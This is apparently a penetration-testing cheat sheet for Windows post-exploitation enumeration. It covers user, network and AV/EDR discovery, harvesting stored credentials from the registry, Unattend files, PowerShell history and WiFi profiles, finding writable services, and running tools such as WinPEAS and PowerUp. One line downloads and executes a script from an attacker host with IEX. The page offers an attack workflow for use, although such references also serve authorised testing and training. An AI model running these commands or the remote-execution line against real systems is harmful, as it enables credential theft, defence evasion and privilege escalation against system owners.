Enumeration & Situational Awareness
You have a shell. Before exploiting anything, understand where you are, what you have, and what's misconfigured. This page covers manual enumeration and automated tools.
Sections Enumeration & Situational Awareness
Current User Context
Who you are and what privileges you hold.
PS C:\> whoami
PS C:\> whoami /priv
PS C:\> whoami /groups
PS C:\> whoami /allwhoami /priv immediately. If you see SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege, SeDebugPrivilege, SeBackupPrivilege, or SeRestorePrivilege enabled, you likely have a direct path to SYSTEM (see Token & Potato Attacks page).System Information
OS version, architecture, and patch level.
PS C:\> systeminfoJust the OS name and version.
PS C:\> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"List installed hotfixes (look for missing patches).
PS C:\> wmic qfe list briefPS C:\> Get-HotFix | Sort-Object -Property InstalledOn -DescendingCheck architecture (32-bit vs 64-bit).
PS C:\> [Environment]::Is64BitOperatingSystem
PS C:\> [Environment]::Is64BitProcessUser & Group Enumeration
List local users.
PS C:\> net userDetails on a specific user.
PS C:\> net user <USER>List local groups.
PS C:\> net localgroupMembers of the local Administrators group.
PS C:\> net localgroup AdministratorsCheck if current user is in any interesting groups.
PS C:\> net localgroup "Remote Desktop Users"
PS C:\> net localgroup "Remote Management Users"
PS C:\> net localgroup "Backup Operators"Network Information
Network interfaces and IP addresses.
PS C:\> ipconfig /allRouting table (check for dual-homed hosts or internal subnets).
PS C:\> route printARP cache (discover other hosts on the local network).
PS C:\> arp -aActive connections and listening ports.
PS C:\> netstat -anoFilter for listening ports only.
PS C:\> netstat -ano | findstr LISTENINGDNS cache (reveals recently resolved internal hostnames).
PS C:\> ipconfig /displaydnsFirewall status and rules.
PS C:\> netsh advfirewall show allprofiles
PS C:\> netsh advfirewall firewall show rule name=allProcess & Service Enumeration
List running processes.
PS C:\> tasklist /vPS C:\> Get-Process | Select-Object Id, ProcessName, PathCheck for AV/EDR processes.
PS C:\> tasklist /v | findstr /i "defender symantec crowdstrike carbon sentinel mcafee sophos cylance"List running services.
PS C:\> Get-Service | Where-Object {$_.Status -eq 'Running'}PS C:\> wmic service list briefFind services running as SYSTEM or with high-privilege accounts.
PS C:\> Get-WmiObject win32_service | Select-Object Name, StartName, PathName, State | Where-Object {$_.State -eq 'Running'} | Format-Table -AutoSizeLocalSystem, NT AUTHORITY\SYSTEM, or a domain admin account are high-value targets. If you can hijack the binary or modify the service config, you escalate to that account.Installed Software
List installed software.
PS C:\> Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall*" | Select-Object DisplayName, DisplayVersion, InstallDate32-bit software on 64-bit OS.
PS C:\> Get-ItemProperty "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall*" | Select-Object DisplayName, DisplayVersionCheck Program Files directories.
PS C:\> dir "C:\Program Files"
PS C:\> dir "C:\Program Files (x86)"Credential Hunting
Saved Credentials
Check for saved credentials in Windows Credential Manager.
PS C:\> cmdkey /listIf credentials are saved, use them with runas.
PS C:\> runas /savecred /user:<USER> cmd.exeFiles with Credentials
Search for files that commonly contain passwords.
PS C:\> findstr /si "password" *.txt *.xml *.ini *.config *.cfgPS C:\> dir /s /b _pass_.txt _pass_.xml _cred_ _vnc_ *.config 2>$nullCheck common locations.
PS C:\> type C:\Users<USER>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
PS C:\> type C:\Windows\System32\drivers\etc\hosts
PS C:\> type C:\Windows\Panther\Unattend.xml
PS C:\> type C:\Windows\Panther\unattend\Unattend.xml
PS C:\> type C:\Windows\system32\sysprep\sysprep.xml
PS C:\> type C:\Windows\system32\sysprep\Unattend.xmlRegistry Credentials
AutoLogon credentials.
PS C:\> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
PS C:\> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPasswordVNC passwords.
PS C:\> reg query "HKCU\SOFTWARE\ORL\WinVNC3\Password"
PS C:\> reg query "HKCU\SOFTWARE\TightVNC\Server" /v PasswordPuTTY stored sessions (may contain proxy credentials).
PS C:\> reg query "HKCU\SOFTWARE\SimonTatham\PuTTY\Sessions" /sSNMP community strings.
PS C:\> reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ValidCommunities"Search registry for password strings.
PS C:\> reg query HKLM /f password /t REG_SZ /s 2>$null
PS C:\> reg query HKCU /f password /t REG_SZ /s 2>$nullWiFi Passwords
List saved WiFi profiles.
PS C:\> netsh wlan show profilesExtract a specific WiFi password.
PS C:\> netsh wlan show profile name="<PROFILE_NAME>" key=clearDPAPI Protected Secrets
List credential blobs.
PS C:\> dir C:\Users<USER>\AppData\Local\Microsoft\Credentials
PS C:\> dir C:\Users<USER>\AppData\Roaming\Microsoft\CredentialsScheduled Tasks
List all scheduled tasks.
PS C:\> schtasks /query /fo LIST /vLook for tasks running as SYSTEM or high-privilege accounts with writable scripts/binaries.
PS C:\> schtasks /query /fo LIST /v | findstr /i "Task To Run|Run As User|TaskName"PS C:\> Get-ScheduledTask | Where-Object {$_.Principal.UserId -like '*SYSTEM*'} | Select-Object TaskName, @{N='Action';E={$_.Actions.Execute}}Writable Directories & Files
Check for writable directories in PATH.
PS C:\> $env:Path -split ';' | ForEach-Object { icacls $_ 2>$null }Check write permissions on common directories.
PS C:\> icacls "C:\Program Files" /t /c 2>$null | findstr /i "(F) (M) (W) (CI) (OI)"
PS C:\> icacls "C:\Program Files (x86)" /t /c 2>$null | findstr /i "(F) (M) (W) (CI) (OI)"Find world-writable files and folders.
PS C:\> Get-ChildItem "C:" -Recurse -ErrorAction SilentlyContinue | Where-Object { (Get-Acl $_.FullName).Access | Where-Object { $_.IdentityReference -match "Everyone|BUILTIN\Users|Authenticated Users" -and $_.FileSystemRights -match "Write|Modify|FullControl" } } | Select-Object FullNameService Binary & Config Permissions
Check permissions on service binaries.
PS C:\> Get-WmiObject win32_service | Where-Object {$_.State -eq 'Running'} | ForEach-Object { Write-Host $_.Name "-" $_.PathName; icacls ($_.PathName -replace '"','').Trim().Split(' ')[0] 2>$null }Check if current user can modify service configurations.
PS C:\> sc qc <SERVICE_NAME>PS C:\> Get-WmiObject win32_service | Select-Object Name, PathName, StartMode, StartName | Format-Table -AutoSizeAlwaysInstallElevated Check
If both registry keys are set to 1, you can install an MSI package as SYSTEM.
PS C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedPS C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated0x1, see Service & Registry Exploits page for the MSI payload technique.UAC Status
Check UAC configuration.
PS C:\> reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
PS C:\> reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin
PS C:\> reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicyEnableLUA = 0 means UAC is disabled. LocalAccountTokenFilterPolicy = 1 means remote local admin accounts get full tokens (no UAC filtering over the network).Automated Enumeration Tools
WinPEAS
Comprehensive automated enumeration (the go-to tool).
PS C:\> .\winPEASx64.exeQuiet mode (less output, faster).
PS C:\> .\winPEASx64.exe quietSpecific checks only.
PS C:\> .\winPEASx64.exe quiet servicesinfo
PS C:\> .\winPEASx64.exe quiet userinfo
PS C:\> .\winPEASx64.exe quiet filesinfoPowerUp
PowerShell-based privesc enumeration.
PS C:\> . .\PowerUp.ps1
PS C:\> Invoke-AllChecksOr load remotely.
PS C:\> IEX(New-Object Net.WebClient).DownloadString('http://<ATTACKER_IP>/PowerUp.ps1')
PS C:\> Invoke-AllChecksSeatbelt
Detailed host survey and security configuration checks.
PS C:\> .\Seatbelt.exe -group=allSpecific modules.
PS C:\> .\Seatbelt.exe -group=user
PS C:\> .\Seatbelt.exe -group=system
PS C:\> .\Seatbelt.exe -group=miscPrivescCheck
PowerShell alternative to WinPEAS.
PS C:\> . .\PrivescCheck.ps1
PS C:\> Invoke-PrivescCheckExtended mode.
PS C:\> Invoke-PrivescCheck -ExtendedSharpUp
C# version of PowerUp (better for AV evasion).
PS C:\> .\SharpUp.exe audit